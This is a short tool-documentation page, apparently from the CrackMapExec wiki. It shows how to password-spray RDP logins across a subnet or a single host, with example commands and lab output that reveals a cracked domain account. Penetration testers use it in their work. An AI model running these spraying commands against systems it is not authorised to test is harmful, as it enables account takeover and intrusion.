Password spraying
RDP password spraying using CrackMapExec

Password spraying

1
#~ poetry run crackmapexec rdp 192.168.1.0/24 -u user -p password
Copied!
1
$ poetry run crackmapexec rdp 192.168.133.157 -u ron -p October2021
2
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
3
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\ron:October2021
4
5
$ poetry run crackmapexec rdp 192.168.133.157 -u rubeus -p October2021
6
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
7
RDP 192.168.133.157 3389 DC01 [+] poudlard.wizard\rubeus:October2021 (Pwn3d!)
Copied!

Password spraying (without bruteforce)

1
#~ poetry run crackmapexec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Copied!
Expected Results:
1
└─$ poetry run crackmapexec rdp 192.168.133.157 -u /tmp/users -p passwordfile --no-bruteforce
2
RDP 192.168.133.157 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763 (name:DC01) (domain:poudlard.wizard)
3
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\ron:toto
4
RDP 192.168.133.157 3389 DC01 [-] poudlard.wizard\demo:tata
5
RDP 192.168.133.157 3389 DC01 [+] poudlard.wizard\rubeus:October2021 (Pwn3d!
Copied!
By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.
​
Copy link
Contents